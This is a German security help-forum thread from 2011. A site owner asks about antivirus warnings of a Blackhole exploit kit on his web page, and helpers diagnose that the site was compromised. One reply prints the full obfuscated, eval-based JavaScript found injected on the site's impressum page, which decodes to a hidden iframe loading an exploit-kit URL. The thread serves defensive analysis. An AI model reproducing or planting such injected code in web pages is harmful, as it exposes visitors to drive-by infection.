Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Fehlermeldung Blackhole.Exploit Kit

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 09.08.2011, 19:24   #1
hudschi
 
Fehlermeldung Blackhole.Exploit Kit - Frage

Fehlermeldung Blackhole.Exploit Kit



Hallo,
ich habe ein Problem mit meiner Webseite.
Immer wenn ein Fan die Seite aufruft kommt folgende Fehlermeldung:



Bei vielen anderen Fans ist das aber nicht der Fall.
Was ist hier das Problem ?

Danke für die Hilfe
Gruß
JN

Alt 12.08.2011, 10:55   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Fehlermeldung Blackhole.Exploit Kit - Standard

Fehlermeldung Blackhole.Exploit Kit



Es kann ein Fehlalarm sein oder die Seite wurde kompromittiert.
Du betreust die Website?
__________________

__________________

Alt 12.08.2011, 19:10   #3
hudschi
 
Fehlermeldung Blackhole.Exploit Kit - Standard

Fehlermeldung Blackhole.Exploit Kit



ja ich betreue die seite ansich
was genau meinst du mit deiner antwort ?

gruß
__________________

Alt 12.08.2011, 19:41   #4
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Fehlermeldung Blackhole.Exploit Kit - Standard

Fehlermeldung Blackhole.Exploit Kit



Was ist an meiner Antwort denn nicht zu verstehen?
Als Administrator deiner Seite müsstest DU wissen, ob auf ihr was verändert wurde!
Ich kann nur sagen, dass es entweder ein Fehlalarm ist oder ein bislang fast unbekannter Schädling (ein Exploit) dort in ihr integriert wurde.

Sicherlich hast du Backups der Seite. Springt AVG da auch an?
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 12.08.2011, 20:19   #5
hudschi
 
Fehlermeldung Blackhole.Exploit Kit - Standard

Fehlermeldung Blackhole.Exploit Kit



ich habe die seite ansich erstellt aber jemand anderes bearbeitet sie weiter, klar ansich wir ja immer mal was verändert.
komischerweise springt diese meldung nicht bei mehreren auf

ich muss nochmal genau nachfragen wann die meldung kommt usw


Alt 12.08.2011, 20:23   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Fehlermeldung Blackhole.Exploit Kit - Standard

Fehlermeldung Blackhole.Exploit Kit



Zitat:
komischerweise springt diese meldung nicht bei mehreren auf
Wieso "komischerweise"? Ich hab dir erklärt, dass es wohl am ehestens ein Fehlalarm ist.
Man sollte das aber prüfen. Ich weiß nicht, wie sehr du diesem Menschen traust, der ständig deine Seite verändern darf. Ist ja auch möglich, dass zB wegen gravierender Versäumnisse Sicherheitslücken ausgenutzt werden konnten oder er "zufällig" dort den Exploit eingebaut hat.

Ich würde im Moment einfach nur von einem Fehalarm ausgehen.
__________________
--> Fehlermeldung Blackhole.Exploit Kit

Alt 12.08.2011, 22:57   #7
handball10
/// Helfer-Team
 
Fehlermeldung Blackhole.Exploit Kit - Standard

Fehlermeldung Blackhole.Exploit Kit



Hallo hudschi,

Ich würde mal sagen, dass zumindest die Seite "impressum.htm" kompromittiert ist!
Nach dem Body-Bereich sind noch zwei Javascript eingebunden:
Code:
ATTFilter
function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var cg={jmu:1935,onyv:function(){createCSS("#c0","background: url(data:,evaString.fromCharCode)");var dtm=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var neki=r[i].cssRules||r[i].rules;for(var llqx=0;llqx<neki.length;llqx++){var hyww=neki.item?neki.item(llqx):neki[llqx];vh=hyww.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];if((vh!=null)&&(vh.indexOf("Str")!=-1))
dtm=vh;};}catch(e){};}
var s="";var g=function(){return this;}();fhxt=g[dtm.substr(0,3)+"l"];var xp="1926q1926q1830q1833q1903q1895q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1894q1812q1922q1926q1926q1926q1830q1833q1821q1838q1826q1834q1821q1895q1894q1876q1922q1926q1926q1810q1903q1834q1827q1820q1834q1903q1812q1922q1926q1926q1926q1817q1838q1821q1903q1837q1835q1814q1903q1874q1903q1835q1824q1836q1818q1826q1834q1825q1819q1889q1836q1821q1834q1838q1819q1834q1866q1827q1834q1826q1834q1825q1819q1895q1901q1837q1824q1835q1814q1901q1894q1876q1922q1926q1926q1926q1819q1821q1814q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1838q1823q1823q1834q1825q1835q1868q1831q1830q1827q1835q1895q1837q1835q1814q1894q1876q1922q1926q1926q1926q1810q1903q1836q1838q1819q1836q1831q1903q1895q1834q1894q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1837q1824q1835q1814q1903q1874q1903q1837q1835q1814q1876q1922q1926q1926q1926q1810q1922q1926q1926q1926q1830q1833q1903q1895q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1894q1812q1922q1926q1926q1926q1926q1830q1833q1821q1838q1826q1834q1821q1895q1894q1876q1922q1926q1926q1926q1810q1903q1834q1827q1820q1834q1903q1812q1922q1926q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1816q1821q1830q1819q1834q1895q1901q1875q1830q1833q1821q1838q1826q1834q1903q1820q1821q1836q1874q1896q1831q1819q1819q1823q1877q1888q1888q1835q1886q1833q1886q1816q1889q1819q1828q1888q1830q1825q1835q1834q1815q1889q1823q1831q1823q1872q1819q1823q1874q1882q1881q1836q1837q1838q1885q1886q1884q1887q1882q1837q1837q1885q1833q1885q1887q1896q1903q1816q1830q1835q1819q1831q1874q1896q1886q1887q1896q1903q1831q1834q1830q1832q1831q1819q1874q1896q1886q1887q1896q1903q1820q1819q1814q1827q1834q1874q1896q1817q1830q1820q1830q1837q1830q1827q1830q1819q1814q1877q1831q1830q1835q1835q1834q1825q1876q1823q1824q1820q1830q1819q1830q1824q1825q1877q1838q1837q1820q1824q1827q1818q1819q1834q1876q1827q1834q1833q1819q1877q1887q1876q1819q1824q1823q1877q1887q1876q1896q1873q1875q1888q1830q1833q1821q1838q1826q1834q1873q1901q1894q1876q1922q1926q1926q1926q1810q1922q1926q1926q1810q1922q1926q1926q1833q1818q1825q1836q1819q1830q1824q1825q1903q1830q1833q1821q1838q1826q1834q1821q1895q1894q1812q1922q1926q1926q1926q1817q1838q1821q1903q1833q1903q1874q1903q1835q1824q1836q1818q1826q1834q1825q1819q1889q1836q1821q1834q1838q1819q1834q1866q1827q1834q1826q1834q1825q1819q1895q1896q1830q1833q1821q1838q1826q1834q1896q1894q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1820q1821q1836q1896q1891q1896q1831q1819q1819q1823q1877q1888q1888q1835q1886q1833q1886q1816q1889q1819q1828q1888q1830q1825q1835q1834q1815q1889q1823q1831q1823q1872q1819q1823q1874q1882q1881q1836q1837q1838q1885q1886q1884q1887q1882q1837q1837q1885q1833q1885q1887q1896q1894q1876q1833q1889q1820q1819q1814q1827q1834q1889q1817q1830q1820q1830q1837q1830q1827q1830q1819q1814q1874q1896q1831q1830q1835q1835q1834q1825q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1823q1824q1820q1830q1819q1830q1824q1825q1874q1896q1838q1837q1820q1824q1827q1818q1819q1834q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1827q1834q1833q1819q1874q1896q1887q1896q1876q1833q1889q1820q1819q1814q1827q1834q1889q1819q1824q1823q1874q1896q1887q1896q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1816q1830q1835q1819q1831q1896q1891q1896q1886q1887q1896q1894q1876q1833q1889q1820q1834q1819q1870q1819q1819q1821q1830q1837q1818q1819q1834q1895q1896q1831q1834q1830q1832q1831q1819q1896q1891q1896q1886q1887q1896q1894q1876q1922q1926q1926q1926q1835q1824q1836q1818q1826q1834q1825q1819q1889q1832q1834q1819q1866q1827q1834q1826q1834q1825q1819q1820q1869q1814q1851q1838q1832q1857q1838q1826q1834q1895q1896q1837q1824q1835q1814q1896q1894q1844q1887q1842q1889q1838q1823q1823q1834q1825q1835q1868q1831q1830q1827q1835q1895q1833q1894q1876q1922q1926q1926q1810".split("q");lnek=fhxt(dtm.substr(3));for(var i=0;i<xp.length;i++){qvd=cg.jmu-parseInt(xp[i]);s+=(lnek(qvd));}
fhxt(s);}};cg.onyv();
         
Decodiert ergibt das ganze einen (mittlerweile toten) Iframe, der eine Seite nach dem BlackHole-Exploit-URL-Muster einbindet.
Die URL scheint offline zu sein...

Jemand dürfte sich auf jeden Fall Zugang zur Seite verschafft haben, oder Sicherheitslücken ausgenutzt haben.
Mehr kann ich auch nicht dazu sagen.

Ich an deiner Stelle, würde umgehend die Seite auf weitere solcher obskuren Scripte auntersuchen und ggf. sofort entfernen!

Viel Erfolg dabei

Gruß
Handball10

Alt 12.08.2011, 23:18   #8
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Fehlermeldung Blackhole.Exploit Kit - Standard

Fehlermeldung Blackhole.Exploit Kit



Hm, also zumindest teils kompromittiert.
Hilft wohl nur ein sauberes Backup und sofort etwaige Sicherheitslücken zu entfernen
__________________
Logfiles bitte immer in CODE-Tags posten

Antwort

Themen zu Fehlermeldung Blackhole.Exploit Kit
andere, anderen, aufruf, fehlermeldung, fehlermeldung blackhole.exploit kit, folge, folgende, problem




Ähnliche Themen: Fehlermeldung Blackhole.Exploit Kit


  1. Fehlermeldung nach gescheitertem Filmstreaming- Fehlermeldung regedit.exe ist keine zulässige WIN32-Anwendung
    Log-Analyse und Auswertung - 27.03.2014 (15)
  2. ZoneAlarm hat zwei Viren gefunden: HEUR:Exploit.Script.Generic und HEUR:Exploit.Java.Generic
    Log-Analyse und Auswertung - 21.02.2014 (15)
  3. Exploit Shield zu Malwarebytes Anti-Exploit
    Antiviren-, Firewall- und andere Schutzprogramme - 09.07.2013 (4)
  4. GVU Trojaner-Problem!(Exploit.Drop.GS;Exploit.drop.GSA;trojan.ransom.SUGen;--->Malwarebytes-Funde)
    Plagegeister aller Art und deren Bekämpfung - 02.03.2013 (6)
  5. Trojaner HEUR:Exploit.Java.CVE-2012-0507.gen und HEUR:Exploit.Java.Generic
    Log-Analyse und Auswertung - 26.01.2013 (24)
  6. Sophos Sicherheitsbericht 2013 - Blackhole wird Malware-Marktführer
    Nachrichten - 05.12.2012 (0)
  7. HEUR:Exploit.Java.CVE-2012-4681.gen" sowie mehrfach Exploit.Java.CVE-2012-0507.ou mit kaspersky gefunden in C:Dokumente und Einstellungen ge
    Plagegeister aller Art und deren Bekämpfung - 21.11.2012 (11)
  8. Exploit-CVE2012-1723.f und Exploit-PDF!Blacole.o gefunden
    Log-Analyse und Auswertung - 02.10.2012 (11)
  9. EXP/CVE-2010-0840.HG(Exploit), EXP/JAVA.Ternub.Gen(Exploit) und TR/Agent.464.4(Trojaner) - nicht totzukriegen
    Plagegeister aller Art und deren Bekämpfung - 14.08.2012 (12)
  10. Desinfec't 2012/Kaspersky findet Exploit.Java.CVE-2011-3544.** und Exploit.Java.CVE-2012-0507.**
    Plagegeister aller Art und deren Bekämpfung - 22.06.2012 (21)
  11. Blackhole Exploit Kit - Virusinfektion ja oder nein
    Plagegeister aller Art und deren Bekämpfung - 12.06.2012 (27)
  12. Desinfec't 2012/Kaspersky findet Exploit.Java.CVE-2011-3544.** und Exploit.Java.CVE-2012-0507.**
    Mülltonne - 11.06.2012 (0)
  13. AVG-Meldungen: "Exploit Blackhole Exploit KIT" und "Infected Virus found JD/Redir" - Bitte um Hilfe
    Plagegeister aller Art und deren Bekämpfung - 23.12.2011 (11)
  14. Homepage Blackhole Exploit Kit Type 1889
    Plagegeister aller Art und deren Bekämpfung - 20.10.2011 (0)
  15. Blackhole Exploit Kit platziert fake Win7Recovery IDE/SATA Fehlermeldungen
    Plagegeister aller Art und deren Bekämpfung - 23.05.2011 (5)
  16. infekt mit: exploit.wmf + exploit.java.ByteVerify + sploit[1].anr
    Plagegeister aller Art und deren Bekämpfung - 29.03.2006 (15)
  17. exploit-byteVerify,JS/Exploit-DialogArg.b,Exploit-mhtRedir.gen. logfile auswerten
    Log-Analyse und Auswertung - 29.10.2004 (4)

Zum Thema Fehlermeldung Blackhole.Exploit Kit - Hallo, ich habe ein Problem mit meiner Webseite. Immer wenn ein Fan die Seite aufruft kommt folgende Fehlermeldung: Bei vielen anderen Fans ist das aber nicht der Fall. Was ist - Fehlermeldung Blackhole.Exploit Kit...
Archiv
Du betrachtest: Fehlermeldung Blackhole.Exploit Kit auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.